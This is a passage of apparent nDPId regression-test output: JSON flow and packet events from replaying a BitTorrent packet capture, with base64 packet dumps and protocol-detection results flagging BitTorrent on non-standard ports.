/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/+\/\/\/7\/f\/+\/\/\/\/\/\/\/\/\/9\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/v\/\/\/\/\/\/\/7\/\/\/\/7+\/+\/\/\/+\/\/\/\/\/v\/\/\/\/\/\/3\/\/\/\/\/\/\/\/\/\/\/\/\/7\/\/8\/\/\/\/\/\/\/f\/\/\/\/3\/\/\/\/\/\/\/\/+AAAAABQQAAAI1AAAABQQAAAEuAAAABQQAAABqAAAABQQAAAE\/AAAABQQAAABtAAAABQQAAAKkAAAABQQAAAElAAAABQQAAAL5AAAABQQAAANYAAAABQQAAAA2AAAABQQAAAIPAAAABQQAAAJBAAAABQQAAAAOAAAABQQAAAMMAAAABQQAAAJ5AAAABQQAAAF6AAAABQQAAAJZAAAABQQAAAATAAAABQQAAAM4AAAABQQAAAItAAAABQQAAAHdAAAABQQAAAEPAAAABQQAAAMNAAAABQQAAABX"} 
-00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":45,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469975234,"flow_last_seen":1455469975234,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469975234,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.26.95.30","src_port":52911,"dst_port":22673,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00564{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1455469975234,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469975234,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4WJNAAEAGAADAqAEDlxpfHs6vWJEERbWJ8qKonIAYJJ+4TgAAAQEIChncDxURKgrLE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1Bjhul1XASmRgFxRA="} -00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469975234,"flow_last_seen":1455469975234,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469975234,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.26.95.30","src_port":52911,"dst_port":22673,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": 
{"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":46,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469975240,"flow_last_seen":1455469975240,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469975240,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.72.255.163","src_port":52912,"dst_port":59928,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00567{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1455469975240,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469975240,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4VgZAAEAGAADAqAEDl0j\/o86w6hjbuZSz\/XvqFoAYKEhZAgAAAQEIChncDxoAaM\/9E0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjpHIptJ+s3GSLpo="} -00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469975240,"flow_last_seen":1455469975240,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469975240,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.72.255.163","src_port":52912,"dst_port":59928,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI 
(cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":47,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469975265,"flow_last_seen":1455469975265,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469975265,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.53.228.2","src_port":52909,"dst_port":14627,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00565{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1455469975265,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469975265,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4dKFAAEAGAADAqAEDTzXkAs6tOSO1PcfcBOlxsoAYN4r1TQAAAQEIChncDzIAAH\/nE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjpuHBUmeY0dBAis="} -00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":47,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469975265,"flow_last_seen":1455469975265,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469975265,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.53.228.2","src_port":52909,"dst_port":14627,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": 
{"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} -00596{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1455469975295,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":157,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":157,"pkt_l4_len":123,"thread_ts_msec":1455469975295,"pkt":"xCwDBkn+LFbcjDU0CABFAACPKABAAHIGh9GXSP+jwKgBA+oYzrD9e+oW27mU94AYAQF3EQAAAQEICgBo0AMZ3A8aE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMzQ1MC3wopW+kcQUcjSA5QoAAADnFABkMTplaTBlNDppcHY0NDqXSA=="} -00613{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1455469975314,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1455469975314,"pkt":"xCwDBkn+LFbcjDU0CABFAACdCeVAAHIGRpKXGl8ewKgBA1iRzq\/yoqicBEW1zYAYHVwArAAAAQEIChEqCxYZ3A8VE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMzQ1MC2coV7lk33H8ZRraqcAAADnFABkMTplaTBlNDppcHY0NDqXGl8eMTI6Y29tcGxldGVf"} 
-00991{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1455469975341,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":449,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":449,"pkt_l4_len":415,"thread_ts_msec":1455469975341,"pkt":"LFbcjDU0xCwDBkn+CABFAAGz+chAAEAGAADAqAEDUjrYc86rlaExvR16+FTQoYAY\/\/\/t\/gAAAQEIChncD3wAhEZHAAAA+hQAZDE6ZWkwZTQ6aXB2NDQ6UjfNATQ6aXB2NjE2Ov6AAAAAAAAAxiwD\/\/4GSf4xMjpjb21wbGV0ZV9hZ29pMWUxOm1kMTE6dXBsb2FkX29ubHlpM2UxMjp1dF9ob2xlcHVuY2hpNGUxMTp1dF9tZXRhZGF0YWkyZTY6dXRfcGV4aTFlMTI6dXRfcmVjb21tZW5kaTVlMTA6dXRfY29tbWVudGk2ZWUxMzptZXRhZGF0YV9zaXplaTE5MDA5ZTE6cGk0MDk1OWU0OnJlcXFpMjU1ZTE6djE5OsK1VG9ycmVudCBNYWMgMS44LjY2OnlvdXJpcDQ6UjrYc2UAAAABDwAAAAMJn\/8AAAADFAMAAAAAAQIAAABlFAZkODptc2dfdHlwZWkwZTM6bnVtaTIwZTY6ZmlsdGVyNjQ6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGU="} -01314{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1455469975379,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":600,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":600,"pkt_l4_len":566,"thread_ts_msec":1455469975379,"pkt":"xCwDBkn+LFbcjDU0CABFAAJKCedAAHIGROOXGl8ewKgBA1iRzq\/yoqkFBEW1zYAYHVwJbQAAAQEIChEqC1QZ3A9hYWdvaTJlMTptZDExOnVwbG9hZF9vbmx5aTNlMTE6bHRfZG9udGhhdmVpN2UxMjp1dF9ob2xlcHVuY2hpNGUxMTp1dF9tZXRhZGF0YWkyZTY6dXRfcGV4aTFlMTA6dXRfY29tbWVudGk2ZWUxMzptZXRhZGF0YV9zaXplaTE5MDA5ZTE6cGkyMjY3M2U0OnJlcXFpMjU1ZTE6djE1Os68VG9ycmVudCAzLjQuNTI6eXBpNTI5MTFlNjp5b3VyaXA0OlI3zQFlAAAAdAV\/v+\/\/f\/\/+\/\/\/\/\/\/\/\/\/\/fv\/\/\/\/\/\/\/\/\/\/3\/\/\/\/\/\/\/\/f\/\/\/\/\/9\/\/\/\/\/\/\/\/\/+\/\/\/\/\/\/\/\/\/\/7\/\/9\/\/\/\/\/\/\/\/\/\/\/\/\/9\/\/\/\/\/f\/\/\/\/7\/7\/\/3\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/9\/9\/\/\/f\/\/\/\/\/\/\/\/\/\/\/
\/\/\/\/\/\/\/9\/\/\/ff+AAAAABQQAAAC+AAAABQQAAAB0AAAABQQAAAJcAAAABQQAAAOGAAAABQQAAAEaAAAABQQAAAA3AAAABQQAAAL2AAAABQQAAAOAAAAABQQAAAGXAAAABQQAAALiAAAABQQAAAIeAAAABQQAAAFXAAAABQQAAAJLAAAABQQAAAB7AAAABQQAAAI\/AAAABQQAAADyAAAABQQAAAAAAAAABQQAAAAgAAAABQQAAAH+AAAABQQAAANsAAAABQQAAAATAAAABQQAAALWAAAABQQAAAAJAAAABQQAAAGq"} -00703{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1455469975393,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":236,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":236,"pkt_l4_len":202,"thread_ts_msec":1455469975393,"pkt":"LFbcjDU0xCwDBkn+CABFAADeIplAAEAGAADAqAEDl0j\/o86w6hjbuZVQ\/XvsloAYKDdZaAAAAQEIChncD64AaNAEMTI6dXRfaG9sZXB1bmNoaTRlMTE6dXRfbWV0YWRhdGFpMmU2OnV0X3BleGkxZTEyOnV0X3JlY29tbWVuZGk1ZTEwOnV0X2NvbW1lbnRpNmVlMTM6bWV0YWRhdGFfc2l6ZWkxOTAwOWUxOnBpNDA5NTllNDpyZXFxaTI1NWUxOnYxOTrCtVRvcnJlbnQgTWFjIDEuOC42Njp5b3VyaXA0OpdI\/6NlAAAAAQ8="} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":55,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469975407,"flow_last_seen":1455469975407,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469975407,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"120.62.33.241","src_port":52910,"dst_port":39332,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00564{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1455469975407,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469975407,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4fvZAAEAGAADAqAEDeD4h8c6umaQbpzY0C9TW44AYjjZcRQAAAQEIChncD7sAQ+m5E0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1Bjhq4aGFIV+2F24M="} -00865{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":55,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469975407,"flow_last_seen":1455469975407,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469975407,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"120.62.33.241","src_port":52910,"dst_port":39332,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} 
-00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":56,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469975622,"flow_last_seen":1455469975622,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469975622,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.55.129.22","src_port":52908,"dst_port":12097,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00566{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1455469975622,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469975622,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4JlBAAEAGAADAqAEDTzeBFs6sL0FM+lulp3q\/xoAYVhCSYwAAAQEIChncEJACXeJGE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjsY\/A3YcaePRRY8="} -00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":56,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469975622,"flow_last_seen":1455469975622,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469975622,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.55.129.22","src_port":52908,"dst_port":12097,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": 
{"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":59,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469976336,"flow_last_seen":1455469976336,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469976336,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"198.100.146.9","src_port":52915,"dst_port":60163,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00564{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1455469976336,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469976336,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4SfNAAEAGAADAqAEDxmSSCc6z6wOon+tuBozVl4AYZVEahAAAAQEIChncE1MB8nMrE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjlkC3tYvcSfI56Y="} -00865{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":59,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469976336,"flow_last_seen":1455469976336,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469976336,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"198.100.146.9","src_port":52915,"dst_port":60163,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI 
(cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} -00581{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":60,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1455469976513,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":146,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":146,"pkt_l4_len":112,"thread_ts_msec":1455469976513,"pkt":"xCwDBkn+LFbcjDU0CABFEACEZqRAAHYGg6bGZJIJwKgBA+sDzrMGjNWXqJ\/rsoAYAQLT1gAAAQEICgHycz0Z3BNTE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMzQ1MC3wokMyLr47j7jk1aEAAADnFABkMTplaTA="} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":61,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469976582,"flow_last_seen":1455469976582,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469976582,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"190.103.195.56","src_port":52914,"dst_port":46633,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00564{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1455469976582,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469976582,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4BctAAEAGAADAqAEDvmfDOM6ytinSUvXkM6bvoIAY+3dDtgAAAQEIChncFEcAv3iAE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjkKv+eYrLs2+ChY="} 
-00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":61,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469976582,"flow_last_seen":1455469976582,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469976582,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"190.103.195.56","src_port":52914,"dst_port":46633,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} -01351{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1455469976697,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":625,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":625,"pkt_l4_len":591,"thread_ts_msec":1455469976697,"pkt":"xCwDBkn+LFbcjDU0CABFEAJjaOxAAHYGf3\/GZJIJwKgBA+sDzrMGjNXnqJ\/rsoAYAQJs0QAAAQEICgHyc00Z3BQDZTQ6aXB2NDQ6xmSSCTEyOmNvbXBsZXRlX2Fnb2kxZTE6bWQxMTp1cGxvYWRfb25seWkzZTExOmx0X2RvbnRoYXZlaTdlMTI6dXRfaG9sZXB1bmNoaTRlMTE6dXRfbWV0YWRhdGFpMmU2OnV0X3BleGkxZTEwOnV0X2NvbW1lbnRpNmVlMTM6bWV0YWRhdGFfc2l6ZWkxOTAwOWUxOnBpNjAxNjNlNDpyZXFxaTI1NWUxOnYxNTrOvFRvcnJlbnQgMy40LjUyOnlwaTUyOTE1ZTY6eW91cmlwNDpSN80BZQAAAHQFv\/\/3\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/3\/\/\/\/\/\/f\/\/\/\/\/3\/f\/\/\/\/\/\/\/\/\/\/\/\/\/\/v\/\/\/\/\/\/\/\/\/\/7\/\/\/\/\/f\/\/\/\/\/\/\/7\/\/\/\/\/\/\/v\/\/\/9\/\/\/\/\/\/7\/\/\/7\/+7\/\/f\/3\/f\/\/\/\/v\/\/\/\/\/\/\/9\/9\/\/\/\/\/\/\/\/\/\/\/\/\/v\/\/\/\/\/3\/\/\/\/gAAAAAUEAAAClgAAAAUEAAAA6gAAAAUEAAAAugAAAAUEAAAA4AAAAAUEAAABqgAAAAU
EAAACZwAAAAUEAAACTwAAAAUEAAAC8gAAAAUEAAABiQAAAAUEAAAB3QAAAAUEAAADdAAAAAUEAAAC\/gAAAAUEAAACJgAAAAUEAAACiAAAAAUEAAACvwAAAAUEAAACeQAAAAUEAAABRQAAAAUEAAACCwAAAAUEAAAAkgAAAAUEAAACdQAAAAUEAAACoAAAAAUEAAAAAQAAAAUEAAAAFAAAAAUEAAADTw=="} -00581{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":64,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1455469977023,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":147,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":147,"pkt_l4_len":113,"thread_ts_msec":1455469977023,"pkt":"xCwDBkn+LFbcjDU0CABFAACFWMJAAHMGa2W+Z8M4wKgBA7YpzrIzpu+g0lL2KIAYAQKm2wAAAQEICgC\/ehQZ3BRHE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLUJUNzk1MC3xovjV8bH+iIGCHSYAAAEBFABkMTplaTBl"} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":67,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469977229,"flow_last_seen":1455469977229,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469977229,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.15.48.189","src_port":52917,"dst_port":47001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00566{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":67,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1455469977229,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469977229,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4L\/xAAEAGAADAqAEDlw8wvc61t5l0EJCE2E\/BJoAYIPWJ4gAAAQEIChncFslLXJigE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1Bjv4JZL7rS4V2Vgo="} 
-00865{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":67,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469977229,"flow_last_seen":1455469977229,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469977229,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.15.48.189","src_port":52917,"dst_port":47001,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI 